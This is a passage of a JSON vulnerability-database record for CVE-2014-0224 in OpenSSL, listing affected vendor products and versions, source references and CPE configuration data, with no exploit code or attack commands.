        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.4.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "model": "junos 13.3r2-s3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.36"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "color laserjet multifunction printer series q7517a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "400046.380.3"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "ace application control engine appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flex system p460",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-42x)0"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "junos pulse for ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "stunnel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stunnel",
        "version": "5.01"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.18"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.05"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.2"
      },
      {
        "model": "tivoli network manager ip edition fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.94"
      },
      {
        "model": "laserjet enterprise mfp m630 series b3g86a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.0m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.8"
      },
      {
        "model": "dsr-500n rev. a1",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "color laserjet m651 cz257a 2302963 436073",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "model": "color laserjet cm6040 multifunction printer q3938a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52.256.1"
      },
      {
        "model": "netiq sslvpn server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "novell",
        "version": "0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.45"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.4"
      },
      {
        "model": "ios xr software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.77"
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "413011.5"
      },
      {
        "model": "color laserjet cp4005 printer series cb503a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "46.230.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.18"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "model": "sparc m10-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "0"
      },
      {
        "model": "nip2000\u00265000 v100r002c10spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.5"
      },
      {
        "model": "sterling b2b integrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "laserjet enterprise m603 series ce995a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.44"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.8.0"
      },
      {
        "model": "laserjet enterprise mfp m630 series j7x28a 2303714 233000041",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.166"
      },
      {
        "model": "junos 11.4r3.7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "eupp v100r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.0.3"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "junos 13.1r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "model": "dsr-500 rev. a1",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "guardium database activity monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "dgs-1500.20",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "2.51.005"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "laserjet enterprise m602 series ce992a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "project openssl 0.9.8o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "junos d15",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x45-"
      },
      {
        "model": "update manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "laserjet p2055 printer series ce457a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "20141201"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.5"
      },
      {
        "model": "project openssl e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "idol image server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x375087520"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.27"
      },
      {
        "model": "oceanstor s5800t v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "blackberry os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "model": "jabber for mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "model": "itbm standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.0.1"
      },
      {
        "model": "fortigate",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.8"
      },
      {
        "model": "storevirtual 450gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453011.5"
      },
      {
        "model": "mcp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66000"
      },
      {
        "model": "color laserjet flow m680 cz250a 2302963 436072",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.32"
      },
      {
        "model": "unified series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "69000"
      },
      {
        "model": "tivoli netcool/system service monitor fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.6"
      },
      {
        "model": "host checker",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "junos 12.2r8-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.21-20"
      },
      {
        "model": "oceanstor s5600t v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.38"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.11"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.3.1"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.0.6"
      },
      {
        "model": "system x3400m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73791.42"
      },
      {
        "model": "laserjet enterprise color m551 series cf083a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5000"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.1.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.4"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.1.2"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.35"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.97"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.34"
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.22"
      },
      {
        "model": "malware analyzer g2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.1"
      },
      {
        "model": "video surveillance ptz ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "snapdrive for unix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "client applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.14"
      },
      {
        "model": "laserjet enterprise color mfp m880 d7p71a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8000"
      },
      {
        "model": "security module for cisco network registar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "color laserjet cp3525 cc470a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.183.1"
      },
      {
        "model": "sbr carrier",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "8.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.11"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.2"
      },
      {
        "model": "laserjet p4014 cb512a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "open systems snapvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.145"
      },
      {
        "model": "project openssl 0.9.8za",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "storevirtual 450gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "500-320"
      },
      {
        "model": "cloudplatform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.3.0.1"
      },
      {
        "model": "data ontap storage management initiative specification a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0"
      },
      {
        "model": "aura application server sip core pb16",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.9"
      },
      {
        "model": "idp series 5.1r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "s6900 v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "4.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0.00"
      },
      {
        "model": "cloudplatform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.2.1"
      },
      {
        "model": "puremessage for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "5.5.5"
      },
      {
        "model": "proventia network security controller 1.0.3350m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "10.1-122.17"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.5"
      },
      {
        "model": "fortimail build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.6170"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.9.4"
      },
      {
        "model": "junos 10.4r10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "clearpass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.3.2"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30"
      },
      {
        "model": "vfabric web server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.3.4"
      },
      {
        "model": "dsm v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.4.1"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "laserjet enterprise m712 series cf238a 2302963 436080",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "700"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "telepresence mx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "css series content services switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "115000"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "500-370"
      },
      {
        "model": "tivoli workload scheduler distributed fp04",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "unified agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1"
      },
      {
        "model": "oceanstor s5800t v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.35"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "enterprise linux desktop workstation client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.10"
      },
      {
        "model": "web gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.3.2.10"
      },
      {
        "model": "oneview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.05"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "icewall mcrp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.7"
      },
      {
        "model": "rational tau",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.33"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.5"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "web security gateway anywhere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "junos space 13.3r1.9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "laserjet p4515 cb517a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "storevirtual 450gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "s7700\u0026s9700 v200r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "9.3-beta1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "software foundation python",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "python",
        "version": "2.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "model": "laserjet enterprise color mfp m880 a2w75a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8000"
      },
      {
        "model": "security analytics platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.1"
      },
      {
        "model": "horizon workspace server gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.5"
      },
      {
        "model": "laserjet enterprise p3015 ce595a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.186.1"
      },
      {
        "model": "espace usm v100r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.1"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "67899"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.0.0m",
                "versionStartIncluding": "1.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.0.1h",
                "versionStartIncluding": "1.0.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "0.9.8za",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_web_platform:5.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:storage:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_web_server:2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.2.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:filezilla-project:filezilla_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "0.9.45",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:application_processing_engine_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.0.2",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:application_processing_engine:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:cp1543-1_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.1.25",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:cp1543-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:s7-1500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.6",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:s7-1500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:rox_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.16.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
